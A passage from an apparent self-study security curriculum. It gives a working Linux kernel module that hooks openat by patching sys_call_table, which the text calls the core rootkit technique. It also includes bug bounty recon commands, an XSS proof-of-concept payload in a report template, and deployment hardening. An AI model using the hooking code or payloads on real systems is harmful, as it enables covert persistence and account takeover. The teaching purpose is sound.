  │  syscall (e.g., open())     │  sys_open() ← YOUR MODULE INTERCEPTS HERE
  ├────────────────────────────▶│
  │                             │  VFS layer
  │                             │  EXT4 driver
  │◀────────────────────────────│  returns file descriptor
```

**The minimal LKM skeleton:**

```c
// syscall_logger.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("You");
MODULE_DESCRIPTION("System call logger");

// Pointer to the real sys_call_table
static unsigned long *syscall_table;

// Type definition for the original openat syscall
typedef asmlinkage long (*orig_openat_t)(
    const struct pt_regs *regs
);
static orig_openat_t orig_openat;

// Our replacement function
asmlinkage long hooked_openat(const struct pt_regs *regs) {
    char filename[256];
    long ret;
    
    // Copy filename from userspace
    if (strncpy_from_user(filename, (char __user*)regs->si, sizeof(filename)) > 0) {
        printk(KERN_INFO "[syscall_logger] openat: %s (pid=%d)\n",
               filename, current->pid);
    }
    
    // Call the original syscall
    ret = orig_openat(regs);
    return ret;
}

// Disable write protection on page containing syscall table
static void disable_write_protection(void) {
    unsigned long cr0 = read_cr0();
    write_cr0(cr0 & ~0x00010000);  // Clear WP bit
}

static void enable_write_protection(void) {
    unsigned long cr0 = read_cr0();
    write_cr0(cr0 | 0x00010000);  // Set WP bit
}

static int __init syscall_logger_init(void) {
    // Find the syscall table address
    syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
    if (!syscall_table) {
        printk(KERN_ERR "[syscall_logger] Could not find sys_call_table\n");
        return -1;
    }
    
    // Save original syscall
    orig_openat = (orig_openat_t)syscall_table[__NR_openat];
    
    // Replace with our hook
    disable_write_protection();
    syscall_table[__NR_openat] = (unsigned long)hooked_openat;
    enable_write_protection();
    
    printk(KERN_INFO "[syscall_logger] Module loaded. Hooking openat.\n");
    return 0;
}

static void __exit syscall_logger_exit(void) {
    // Restore original syscall
    disable_write_protection();
    syscall_table[__NR_openat] = (unsigned long)orig_openat;
    enable_write_protection();
    
    printk(KERN_INFO "[syscall_logger] Module unloaded.\n");
}

module_init(syscall_logger_init);
module_exit(syscall_logger_exit);
```

```makefile
# Makefile
obj-m += syscall_logger.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```

```bash
make
sudo insmod syscall_logger.ko    # Load module
sudo dmesg | tail -20           # Watch kernel log
# Open any file: cat /etc/hostname
sudo dmesg | tail -5            # See: [syscall_logger] openat: /etc/hostname (pid=12345)
sudo rmmod syscall_logger       # Unload
```

**Why this connects to security:** Rootkits use exactly this technique to hide files, processes, and network connections. Syscall table hooking is how attackers persist in a compromised system. Understanding how to *write* a rootkit module means you can recognize and investigate one.

**Do this in a VM only.** A wrong pointer in kernel code panics the machine. Your DigitalOcean VPS is not for kernel module experiments — use VirtualBox locally.

---

### MONTH 11–12: LIVE BUG BOUNTY HUNTING — THE METHODOLOGY

**The mindset shift:** PortSwigger labs are controlled environments. The vulnerability is guaranteed to exist. HackerOne programs are live systems. The vulnerability might not exist. The scope might exclude the interesting endpoint. Someone might have reported it yesterday.

**The correct mental model:** You are not running a scanner. You are reading an application.

**Pre-hunting research (for every new target):**

```
Step 1: Understand the business
  What does this company actually do?
  What are their highest-value assets? (user data, payments, admin functions)
  What would a real attacker want to compromise?

Step 2: Read the program's policy carefully
  What is in scope? (domains, endpoints, apps)
  What is explicitly out of scope?
  What severity definitions do they use?
  What have they already rewarded? (Hacktivity public reports)

Step 3: Map the attack surface
  Subdomain enumeration (run Vigilante)
  Technology fingerprinting (Wappalyzer, HTTP headers, error messages)
  JavaScript analysis (find API endpoints, hidden parameters, JS secrets)
  Mobile app decompilation (if mobile apps are in scope)
  Archive analysis (Wayback Machine for old endpoints)
```

**The JavaScript analysis technique — high-yield:**

Modern SPAs (React, Vue, Angular, Next.js) put API endpoint definitions in their JavaScript bundles. These endpoints often have less security scrutiny than the main API.

```bash
# Download all JS files from a target:
# First, find them:
curl https://target.com | grep -oE 'src="[^"]+\.js"' | sed 's/src="//;s/"//'

# Analyze with linkfinder (finds endpoints in JS):
pip3 install linkfinder
python3 linkfinder.py -i https://target.com/static/main.chunk.js -o cli

# What you're looking for:
# - /api/internal/  (internal endpoints exposed in frontend code)
# - /api/admin/     (admin endpoints)  
# - API keys hardcoded in JS (misconfiguration finding)
# - GraphQL endpoints (/graphql, /api/graphql)
# - WebSocket endpoints
```

**The manual testing loop for each endpoint:**

```
For every endpoint you find, ask:
1. What does this endpoint DO? Read it carefully.
2. What AUTHENTICATION does it require?
3. What PARAMETERS does it accept?
4. What TRUST does it extend? (Does it make outbound requests? SSRF.)
5. What STATE does it modify? (Race conditions, IDOR)
6. What DATA does it return? (Information disclosure)
7. What HAPPENS if I send unexpected input? (Injection, parser confusion)
```

**The chain mindset — from minor to critical:**

```
Step 1: Find a subdomain with a misconfigured CORS policy
  Allows: Access-Control-Allow-Origin: *
  Impact: Low (no credentials)

Step 2: Find that same subdomain has an XSS
  Impact: Medium (steals data on that subdomain only)

Step 3: Find that the main app's API accepts requests from that subdomain
  via CORS with credentials
  Impact: The XSS on the subdomain can make credentialed API requests to main app
  Combined impact: Critical (account takeover via XSS → CORS bypass)
```

**Report writing — the discipline that gets bugs accepted:**

A well-written report gets triaged faster, gets higher severity ratings, and builds your reputation. Structure:

```markdown
## Summary
One sentence: what the vulnerability is, where it is, and what the impact is.

## Vulnerability Details
- Type: [e.g., Stored XSS]
- Endpoint: [exact URL]
- Parameter: [exact parameter name]
- Authentication required: [yes/no, what role]

## Steps to Reproduce
1. Log in as a normal user at https://target.com/login
2. Navigate to https://target.com/profile/edit
3. In the "display name" field, enter: <img src=x onerror=alert(document.domain)>
4. Click Save
5. Navigate to https://target.com/profile/[your-username]
6. Observe: alert dialog fires showing target.com domain

## Impact
Explain what a real attacker could do with this. Stored XSS allows:
- Session cookie theft (HttpOnly prevents this, but...)
- Account takeover via password change form submission
- Malware distribution to all users who view the profile
- Data exfiltration via fetch() to attacker-controlled server

## Supporting Evidence
[Screenshots, Burp Suite request/response logs, video PoC]

## Suggested Remediation
Encode HTML special characters in user-supplied display name before rendering.
Use textContent instead of innerHTML in the frontend renderer.
Implement a Content Security Policy to limit script execution origins.
```

---

### MONTH 11–12: THE SAAS DEPLOYMENT — PRODUCTION INFRASTRUCTURE

**DigitalOcean VPS initial setup:**

```bash
# SSH in as root — first thing: lock it down
ssh root@YOUR_DROPLET_IP

# Create non-root user
adduser deploy
usermod -aG sudo deploy

# SSH key only — disable password auth
mkdir -p /home/deploy/.ssh
cp ~/.ssh/authorized_keys /home/deploy/.ssh/
chown -R deploy:deploy /home/deploy/.ssh
chmod 700 /home/deploy/.ssh
chmod 600 /home/deploy/.ssh/authorized_keys

# Edit sshd_config:
nano /etc/ssh/sshd_config
# Set:
#   PermitRootLogin no
#   PasswordAuthentication no
#   PubkeyAuthentication yes
systemctl restart sshd

# Firewall
ufw allow OpenSSH
ufw allow 80/tcp
ufw allow 443/tcp
ufw enable
ufw status

# Automatic security updates
apt install unattended-upgrades
dpkg-reconfigure unattended-upgrades
```

**Docker Compose deployment stack:**

```yaml
# docker-compose.yml
version: '3.8'

services:
  app:
    build: ./app
    restart: unless-stopped
    environment:
      - DATABASE_URL=postgresql://app_user:${DB_PASSWORD}@db:5432/app_db
      - REDIS_URL=redis://redis:6379
      - JWT_SECRET=${JWT_SECRET}
    depends_on:
      db:
        condition: service_healthy
      redis:
        condition: service_healthy
    networks:
      - internal
    # No port exposed externally — nginx proxies to it

  db:
    image: postgres:15-alpine
    restart: unless-stopped
    volumes:
      - postgres_data:/var/lib/postgresql/data
    environment:
      POSTGRES_DB: app_db
      POSTGRES_USER: app_user
      POSTGRES_PASSWORD: ${DB_PASSWORD}
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U app_user -d app_db"]
      interval: 10s
      timeout: 5s
      retries: 5
    networks:
      - internal
    # No port exposed externally

  redis:
    image: redis:7-alpine
    restart: unless-stopped
    command: redis-server --requirepass ${REDIS_PASSWORD}
    healthcheck:
      test: ["CMD", "redis-cli", "--no-auth-warning", "-a", "${REDIS_PASSWORD}", "ping"]
      interval: 10s
      timeout: 5s
      retries: 5
    networks:
      - internal

  nginx:
    image: nginx:alpine
    restart: unless-stopped
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf:ro
      - certbot_certs:/etc/letsencrypt:ro
    depends_on:
      - app
    networks:
      - internal
      - external

  certbot:
    image: certbot/certbot
    volumes:
      - certbot_certs:/etc/letsencrypt
      - certbot_www:/var/www/certbot
    command: certonly --webroot -w /var/www/certbot -d yourdomain.com --email you@email.com --agree-tos

volumes:
  postgres_data:
  certbot_certs:
  certbot_www:

networks:
  internal:
    driver: bridge
    internal: true   # No external internet access from internal services
  external:
    driver: bridge
```

**The security architecture of this deployment:**
- `db` and `redis` are on the `internal` network only — no internet exposure
- `app` is on the `internal` network — no direct external access
- Only `nginx` bridges `internal` and `external` — single ingress/egress point
- Environment variables via `.env` file — no secrets in docker-compose.yml
- Health checks ensure dependencies are ready before app starts

**Nginx configuration with security headers:**

```nginx
server {
    listen 443 ssl http2;
    server_name yourdomain.com;

    ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256;

    # Security headers:
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-Frame-Options "DENY" always;
    add_header X-XSS-Protection "1; mode=block" always;
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
    add_header Content-Security-Policy "
        default-src 'self';
        script-src 'self' 'nonce-{NONCE}';
        style-src 'self' 'nonce-{NONCE}';
        img-src 'self' data:;
        font-src 'self';
        connect-src 'self';
        frame-ancestors 'none';
    " always;

    location / {
        proxy_pass http://app:3000;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}

server {
    listen 80;
    server_name yourdomain.com;
    return 301 https://$server_name$request_uri;  # Force HTTPS
}
```

---

### THE SECURITY WHITEPAPER — STRUCTURE

Your Phase 4 capstone requires a published security whitepaper. This is not optional documentation. It demonstrates that you can reason about your own system's security posture — the defining skill of a security engineer.

```markdown
# Security Architecture Whitepaper — [Your SaaS Name]
## Version 1.0 — [Date]

## 1. Executive Summary
One page. What is the system? What is its threat model?
What are the highest-value assets? What security guarantees are claimed?

## 2. System Architecture
Diagram of all components and data flows.
Which components are in-scope for this whitepaper?

## 3. Threat Model
Attacker profiles:
  - External unauthenticated attacker
  - Authenticated user attempting privilege escalation
  - Compromised database (what does the attacker get?)
  - Compromised application server (what does the attacker get?)
  - Malicious insider

STRIDE analysis for each component:
  - Spoofing: How does the system verify identity?
  - Tampering: How does the system detect modification?
  - Repudiation: What is the audit trail?
  - Information Disclosure: What data is exposed where?
  - Denial of Service: What are rate limits and quotas?
  - Elevation of Privilege: What prevents horizontal/vertical privilege escalation?

## 4. Encryption Architecture
  - Data at rest: AES-GCM-256 (key derivation, IV management, storage)
  - Data in transit: TLS 1.3 (cipher suites, certificate management)
  - Key hierarchy: master key → file keys (explain each level)

## 5. Authentication and Authorization
  - Password hashing: Argon2id (parameters, rationale)
  - Session management: token format, storage, expiration, revocation
  - Authorization model: who can access what, how it's enforced

## 6. Security Controls Implemented
  - Content Security Policy (exact policy, rationale for each directive)
  - CORS policy
  - Rate limiting (endpoints, thresholds, enforcement mechanism)
  - Input validation (where applied, what rejected)
  - SQL injection prevention (parameterized queries, ORM usage)

## 7. Known Limitations and Accepted Risks
This section is what separates a genuine whitepaper from marketing.
What did you NOT implement? What assumptions does the security model require?

## 8. Incident Response Plan
How would you know if you were compromised?
What logs exist? Where are they?
What is the response procedure?
```

---

# THE 12-MONTH DEPENDENCY GRAPH — EVERYTHING CONNECTED

```
MONTH 1                    MONTH 4                    MONTH 7                    MONTH 10
────────                   ────────                   ────────                   ─────────
C compilation pipeline ──▶ Go compilation model ──▶  ELF binary internals ──▶  Kernel compilation
         │                          │                          │                          │
Memory layout (stack/heap) ─────────┼─────────────────────────┼──────────────────────────┼──▶ LKM memory access
         │                          │                          │                          │
GDB debugging ─────────────────────┼─────────────────────────┼──────────────────────────┼──▶ Kernel debugging (dmesg)
         │                          │                          │
HTTP/TCP/TLS internals ─────────────┼──────────────────────────┼──▶ Protocol parsing vulns in ctf binaries
         │                          │                          │
Burp Suite (intercept/replay) ──────┼──────────────────────────┼──────────────────────────────▶ Live bounty recon
         │                          │                          │
XSS/SQLi/IDOR ──────────────────────┼──▶ SSRF/OAuth/Race cond ─┼──▶ Chained exploits ──────────▶ HackerOne reports
                                    │                          │
                            PostgreSQL (B-tree) ───────────────┼──▶ Atomic SQL for race cond defense
                                    │                          │
                            AES-GCM-256 implementation ────────┼──▶ Recognize crypto in Ghidra
                                    │                          │
                            Go concurrency (goroutines) ───────┼──▶ Vigilante fuzzer ──────────▶ Live bounty recon tool
                                                               │
                                                    NASM shellcode ─────────────────────────▶ ROP chain construction
                                                               │
                                                    Ghidra decompilation ──────────────────▶ Binary bug analysis
```

---

# THE FINAL RULE

Every time you write a DEVLOG entry answering **"how does this connect to what I learned before?"** — you are building the graph above in your own mind.

The graph is the skill. The individual topics are the nodes. The connections are what make you dangerous.

